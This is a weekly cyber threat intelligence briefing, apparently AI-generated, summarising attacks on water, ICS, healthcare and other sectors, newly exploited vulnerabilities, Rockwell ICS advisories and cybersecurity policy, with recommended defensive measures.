Iranian Hackers Claim California Water Utility Attack as CISA Issues Five Rockwell ICS Advisories; White House Bolsters National Security Systems

Executive Summary

This week's intelligence highlights significant developments across multiple critical infrastructure sectors, with water utilities, industrial control systems, and healthcare facing elevated threat activity.

• Water Sector Alert: California Water Service (Cal Water) is actively investigating claims by Iranian-linked threat actors who assert they compromised the utility's systems. Cal Water reports no operational disruptions to water or wastewater services, but the incident underscores persistent nation-state targeting of water infrastructure.
• Industrial Control Systems: CISA released five ICS advisories on June 16 affecting Rockwell Automation products widely deployed across manufacturing, energy, and critical infrastructure sectors. Affected systems include CompactLogix, FactoryTalk Analytics PavilionX, Logix 5370 & 5570 Controllers, RSLinx, and FLEX I/O EtherNet/IP Adapters.
• Healthcare Breaches: Two significant healthcare-related incidents emerged this week. Digital health company iRhythm confirmed a ransomware-related data breach affecting patient information, while cybercrime group FulcrumSec claims to have exfiltrated 1.3TB of data from pharmaceutical giant Novo Nordisk.
• Policy Development: President Trump signed National Security Presidential Memorandum-12 (NSPM-12), establishing enhanced cybersecurity governance for National Security Systems and reestablishing the Committee on National Security Systems (CNSS).
• Active Exploitation: Multiple vulnerabilities are under active exploitation, including Fortinet FortiSandbox flaws, Cisco SD-WAN Manager (CVE-2026-20262), and LiteSpeed cPanel Plugin vulnerabilities now added to CISA's Known Exploited Vulnerabilities catalog.

Threat Landscape

Nation-State Threat Actor Activities

• Iranian Threat Actors Target Water Infrastructure: Iranian-linked hackers have claimed responsibility for an attack against California Water Service, one of the largest investor-owned water utilities in the United States. While Cal Water has stated there is no indication of operational disruptions to water and wastewater systems, the company is actively investigating the claims. This incident follows a pattern of Iranian threat actors targeting U.S. water utilities, consistent with previous campaigns against water sector SCADA systems.
• China-Linked SprySOCKS Expands to Windows: Security researchers have identified two previously undocumented Windows variants of the SprySOCKS backdoor, previously believed to be Linux-only malware. The Windows variants feature driver-based stealth capabilities and over 30 command-and-control commands. This expansion significantly broadens the threat surface for organizations that may have focused detection efforts solely on Linux environments. Government organizations in at least four countries have been targeted.
• China-Linked Actors Exploit Legacy REDCap Systems: Chinese threat actors are targeting research institutions in the United States and Canada by exploiting vulnerabilities in legacy REDCap (Research Electronic Data Capture) installations. REDCap is widely used in academic and healthcare research environments for collecting and managing research data.
• North Korean APT37 Deploys NarwhalRAT: The North Korean state-sponsored group ScarCruft (APT37) is conducting spear-phishing campaigns using fake Microsoft Account security notifications to deliver NarwhalRAT malware. The social engineering approach leverages trusted Microsoft branding to increase success rates against targeted organizations.

Ransomware and Cybercriminal Developments

• DragonForce Ransomware Abuses Microsoft Teams: The DragonForce ransomware group has developed a sophisticated technique using custom malware named "Backdoor.Turn" to hide command-and-control traffic within Microsoft Teams relay infrastructure. By exploiting a Teams visitor token, the malicious activity appears legitimate to defenders, significantly complicating detection efforts. This technique represents an evolution in ransomware operators' ability to blend into normal enterprise traffic.
• FulcrumSec Claims Novo Nordisk Breach: The hack-and-leak group FulcrumSec claims to have stolen 1.3TB of data from pharmaceutical giant Novo Nordisk. The healthcare and pharmaceutical sectors continue to be high-value targets for cybercriminal groups due to the sensitivity of patient data and intellectual property.
• iRhythm Ransomware Incident: Digital healthcare company iRhythm Holdings confirmed a data breach discovered on June 8, with attackers demanding ransom after stealing patient personal and health information from third-party-hosted business applications.
• Imposter Scam Losses Reach Record Levels: The FTC warned that Americans lost $3.5 billion to imposter scams in 2025, with losses nearly tripling since 2020. The FBI has also noted that courier cash pickups are increasingly being used to circumvent bank transfer monitoring in cryptocurrency investment schemes.

Emerging Attack Vectors

• ClickFix Campaigns Expand: Multiple ClickFix campaigns are delivering three malware loaders—BabaDeda Loader, Lorem Ipsum Loader, and Potemkin—using fake update lures. These campaigns represent an evolution in social engineering techniques targeting end users.
• Atomic Arch Supply Chain Attack: A significant supply chain attack has compromised approximately 1,500 packages in the Arch User Repository (AUR). Arch Linux has suspended account registrations in response to the wave of malicious packages being uploaded.
• GhostTree Attack Technique: A novel attack technique called GhostTree abuses recursive Windows NTFS junctions to generate vast numbers of valid file paths, potentially causing Microsoft Defender folder scans to never complete and leaving malware undetected.
• Steam Workshop Malware Distribution: Threat actors are abusing Steam Workshop, Valve's community content hub, to distribute malware hidden in wallpaper packages for the Wallpaper Engine application.
• JetBrains Marketplace Compromise: At least 15 malicious plugins discovered on the JetBrains Marketplace were designed to steal AI API keys from developers, highlighting the growing value of AI credentials as targets.
• Google Vertex AI SDK Vulnerability: A flaw in the Google Cloud Vertex AI SDK for Python allowed attackers to hijack machine learning model uploads via bucket squatting, potentially enabling code execution within Google's serving infrastructure.

Mobile Threats

• Rokarolla Android Banking Trojan: A new Android banking trojan named Rokarolla is targeting 217 banking and cryptocurrency applications with an extensive set of 137 remote commands. The malware combines banking fraud capabilities with comprehensive device surveillance while blocking fraud alerts to victims.

Sector-Specific Analysis

Water & Wastewater Systems

ELEVATED THREAT LEVEL

The water sector faces heightened threat activity following Iranian hackers' claims of compromising California Water Service systems.

• Cal Water Incident: California Water Service is investigating claims by Iranian-linked threat actors. The utility serves approximately 2 million customers across California, Washington, New Mexico, Hawaii, and Texas. While Cal Water reports no operational disruptions to water or wastewater systems, the investigation is ongoing.
• Recommended Actions for Water Utilities:
  • Review and validate network segmentation between IT and OT environments
  • Audit remote access mechanisms and ensure multi-factor authentication is enforced
  • Verify logging and monitoring capabilities for SCADA and ICS systems
  • Review incident response plans specific to OT environments
  • Consider engaging with WaterISAC for sector-specific threat intelligence

Energy Sector

The energy sector should note the significant Rockwell Automation ICS advisories released this week, as these products are widely deployed in power generation, transmission, and distribution environments.

• Rockwell Automation Vulnerabilities: Five CISA ICS advisories affect products commonly used in energy sector operations:
  • CompactLogix controllers
  • Logix 5370 & 5570 Controllers (vulnerable to denial of service via CIP)
  • FactoryTalk Analytics PavilionX
  • RSLinx communication software
  • FLEX I/O EtherNet/IP Adapters
• Recommended Actions:
  • Inventory all Rockwell Automation products in operational environments
  • Review CISA advisories and assess applicability to deployed systems
  • Prioritize patching based on exposure and criticality
  • Implement network segmentation and monitoring for affected devices

Healthcare & Public Health

ELEVATED THREAT LEVEL

The healthcare sector experienced multiple significant incidents this week, with both patient data and pharmaceutical intellectual property targeted.

• iRhythm Data Breach: iRhythm Holdings confirmed attackers stole patient personal and health information from third-party-hosted business applications. The breach was discovered on June 8, and attackers have demanded ransom.
• Novo Nordisk Claimed Breach: Cybercrime group FulcrumSec claims 1.3TB of data was exfiltrated from the pharmaceutical giant. If confirmed, this could represent significant exposure of proprietary research data and potentially patient information.
• Breach Notification Concerns: A report highlights that errors in breach notification letters are causing confusion among patients, with some recipients mistaking legitimate notices for scams. Healthcare organizations should ensure breach notifications are clear, professional, and include verification mechanisms.
• Research Institution Targeting: China-linked actors are exploiting legacy REDCap installations at U.S. and Canadian research institutions, potentially compromising sensitive research data.
• Upcoming Resource: NIST and HHS OCR will host "Safeguarding Health Information: Building Assurance through HIPAA Security 2026" on September 2, 2026, providing guidance on healthcare security compliance.

Communications & Information Technology

• Supply Chain Attacks: The Atomic Arch attack affecting 1,500 AUR packages and malicious JetBrains Marketplace plugins demonstrate continued targeting of software supply chains and developer ecosystems.
• AI Infrastructure Risks: The Google Vertex AI SDK vulnerability and theft of AI API keys through malicious plugins highlight emerging risks in AI development infrastructure.
• AI Security Patching Challenges: A new report indicates that the rapid pace of AI model releases may be creating security gaps as developers must choose between performance and security.
• CHIPS Act Investment: The Department of Commerce announced a letter of intent for up to $50 million to Coherent Corp. to expand indium phosphide production, supporting domestic semiconductor supply chain resilience.

Financial Services

• Banking Trojan Threat: The Rokarolla Android trojan specifically targets 217 banking and cryptocurrency applications, combining credential theft with fraud alert suppression.
• Open Source Security Initiative: Chainguard, JPMorgan, and BNY have formed "Athena," an industry coalition to identify and remediate vulnerabilities in open source software before attackers can exploit them, with particular focus on AI-discovered vulnerabilities.
• Third-Party Risk Management: New startup Magnitude emerged with $10 million in funding to enhance third-party risk management through autonomous AI agents, reflecting continued industry focus on supply chain and vendor risk.

Transportation Systems

No significant sector-specific incidents were reported this week. However, transportation operators should note:

• Rockwell Automation ICS vulnerabilities may affect transportation control systems
• The SprySOCKS backdoor expansion to Windows increases risk for Windows-based transportation management systems

Government Facilities

• National Security Systems Memo: NSPM-12 establishes enhanced cybersecurity governance for National Security Systems, reestablishing the Committee on National Security Systems (CNSS) with clear accountability structures.
• SprySOCKS Targeting: Government organizations in at least four countries have been targeted by the Windows variants of the SprySOCKS backdoor.

Education Facilities

• Physical Security Enhancement: Illinois' Thornton Township High School District 205 announced deployment of ZeroEyes AI gun detection solution, reflecting continued investment in physical security technologies for educational facilities.

Vulnerability & Mitigation Updates

Critical Vulnerabilities Requiring Immediate Attention

Vulnerability	Affected Products	Status	Priority
Multiple Fortinet FortiSandbox Flaws	FortiSandbox	Actively Exploited	CRITICAL
CVE-2026-20262	Cisco Catalyst SD-WAN Manager	Actively Exploited	CRITICAL
CVE-2026-54420	LiteSpeed cPanel Plugin	Actively Exploited - Added to KEV	CRITICAL
Multiple ICS Vulnerabilities	Rockwell Automation (5 products)	Advisories Released	HIGH

Actively Exploited Vulnerabilities

• Fortinet FortiSandbox: Multiple critical vulnerabilities in Fortinet's FortiSandbox cyber threat detection platform are under active exploitation. Organizations should apply patches immediately and review logs for indicators of compromise. One vulnerability was patched just last week, highlighting the rapid weaponization timeline.
• Cisco SD-WAN Manager (CVE-2026-20262): Cisco has released security updates for a medium-severity flaw that has come under active exploitation. Despite the medium severity rating, active exploitation warrants immediate patching.
• LiteSpeed cPanel Plugin (CVE-2026-54420): CISA has added this vulnerability to the Known Exploited Vulnerabilities catalog, requiring Federal agencies to patch within three days. The flaw enables root privilege escalation.

CISA ICS Advisories (June 16, 2026)

CISA released five Industrial Control System advisories affecting Rockwell Automation products:

1. ICSA-26-167-04: Rockwell Automation CompactLogix
2. ICSA-26-167-01: Rockwell Automation FactoryTalk Analytics PavilionX
3. ICSA-26-167-03: Rockwell Automation Logix 5370 & 5570 Controllers (Denial of Service via CIP)
4. ICSA-26-167-02: Rockwell Automation RSLinx
5. ICSA-26-167-05: Rockwell Automation FLEX I/O EtherNet/IP Adapters

Recommended Actions:

• Review each advisory for applicability to your environment
• Prioritize the Logix 5370 & 5570 denial of service vulnerability for systems where availability is critical
• Implement network segmentation to limit exposure of affected devices
• Monitor for anomalous CIP traffic patterns

Recommended Defensive Measures

• Microsoft Teams Security: Given DragonForce's abuse of Teams relay infrastructure, organizations should:
  • Review and restrict external access to Teams
  • Monitor for anomalous Teams visitor token usage
  • Implement additional logging for Teams-related network traffic
• Email Security: Microsoft has stated that native email security tools are sufficient, but security experts advise caution and recommend layered email security approaches, particularly given the North Korean spear-phishing campaigns using fake Microsoft alerts.
• Zero Trust Implementation: A new analysis indicates that while zero trust architecture remains effective, most organizations implement it incorrectly. Security teams should review their zero trust implementations against established frameworks.
• Android Device Security: Given the Rokarolla trojan threat, organizations should:
  • Enforce mobile device management policies
  • Restrict installation of applications from unknown sources
  • Consider mobile threat defense solutions for corporate devices

Resilience & Continuity Planning

Lessons Learned

• Third-Party Application Risk: The iRhythm breach, which occurred through third-party-hosted business applications, reinforces the importance of comprehensive vendor security assessments and monitoring of data stored in external systems.
• Breach Communication: Reports of confusing breach notification letters highlight the need for clear, professional communication during incident response. Organizations should test breach notification templates and include verification mechanisms for recipients.
• Detection Evasion Evolution: The GhostTree technique and DragonForce's Teams abuse demonstrate that threat actors continue to develop sophisticated evasion techniques. Security teams should regularly test detection capabilities against novel techniques.

Supply Chain Security

• Software Supply Chain: The Atomic Arch attack (1,500 packages), malicious JetBrains plugins, and Steam Workshop malware distribution highlight the breadth of supply chain attack vectors. Organizations should:
  • Implement software composition analysis
  • Verify package integrity before deployment
  • Monitor for anomalous behavior from development tools
• Hardware Supply Chain: The CHIPS Program's $50 million investment in Coherent Corp. for indium phosphide production supports domestic semiconductor supply chain resilience.
• AI Supply Chain: The Athena coalition (Chainguard, JPMorgan, BNY) represents a proactive approach to identifying and remediating open source vulnerabilities before exploitation, with particular focus on AI-discovered flaws.

Cross-Sector Dependencies

• Water-Energy Nexus: The Cal Water incident serves as a reminder that water utilities depend on reliable power, and energy facilities require water for cooling. Disruption to either sector can cascade.
• Healthcare-IT Dependencies: Healthcare breaches at iRhythm and the claimed Novo Nordisk incident demonstrate the sector's reliance on IT infrastructure and third-party services.
• Research Infrastructure: China-linked targeting of REDCap installations affects both healthcare and academic research sectors, potentially compromising clinical trial data and research integrity.

Regulatory & Policy Developments

Federal Guidelines

• NSPM-12 - National Security Systems Cybersecurity: President Trump signed National Security Presidential Memorandum-12, which:
  • Establishes clear governance structure for NSS cybersecurity
  • Defines accountability mechanisms across agencies
  • Reestablishes the Committee on National Security Systems (CNSS)
  • Applies to military and intelligence community systems

International Developments

• UK Social Media Age Verification: The United Kingdom will require ID upload or facial age scanning for new social media accounts, banning users under 16. The requirement takes effect in spring 2027. Security experts have raised concerns about the data protection implications of collecting identity documents and biometric data.
• Anthropic AI Export Controls: Congressional lawmakers expressed caution regarding the Trump administration's Anthropic order, with some requesting additional information before taking positions.

AI Governance

• AI Bills of Materials (AIBOMs): A new roadmap outlines how AI bills of materials, modeled on software BOM standards, could help policymakers understand and regulate AI systems. The framework addresses what AIBOMs should include and how they might be implemented.

Training & Resource Spotlight

New Tools and Frameworks

• TrustCloud Application Risk Platform: TrustCloud offers continuous analysis of security, infrastructure, and governance data to provide CISOs with real-time application risk visibility and board-ready assurance, aiming to replace traditional security questionnaires.
• Ent Endpoint Security Platform: Ent emerged from stealth with $100 million in funding, offering an intent-aware platform designed to interpret user and agent behavior before risky actions are carried out.
• Magnitude TPRM Solution: Magnitude launched with $10 million to enhance third-party risk management through autonomous AI agents.

Industry Research

• ISSA Security Professional Survey: A new study from ISSA finds that over two-thirds of security professionals report that cybersecurity is becoming more challenging, with many feeling challenged by colleagues' involvement in cyber matters.
• Anonymized Infrastructure Survey: Research indicates that 94% of security incidents involve anonymized infrastructure, yet security teams remain largely reactive in their approach to this challenge.
• AI and Cybersecurity Analysis: SecurityWeek published a comprehensive analysis on AI's impact on cybersecurity, covering both defensive applications and attack enablement based on input from dozens of experts.

Professional Development

• Ethical Hacking Career Path: SecurityWeek's interview with ethical hacker Isira Adithya provides insights into building a career through bug bounty programs, from building LED bulbs to earning enough through bounties to purchase a house.

Looking Ahead: Upcoming Events

Workshops and Conferences

• June 22, 2026 - NIST Workshop on Hardware CPE and CVSS Updates: One-day workshop addressing hardware representation in Common Platform Enumeration (CPE) and how the Common Vulnerability Scoring System (CVSS) applies to hardware. Relevant for organizations managing hardware asset inventories and vulnerability management programs.
• June 25, 2026 - Iris Experts Group Annual Meeting:
  Disclaimer

  This briefing is generated using AI analysis of public news sources. Always verify critical information through authoritative sources before taking action.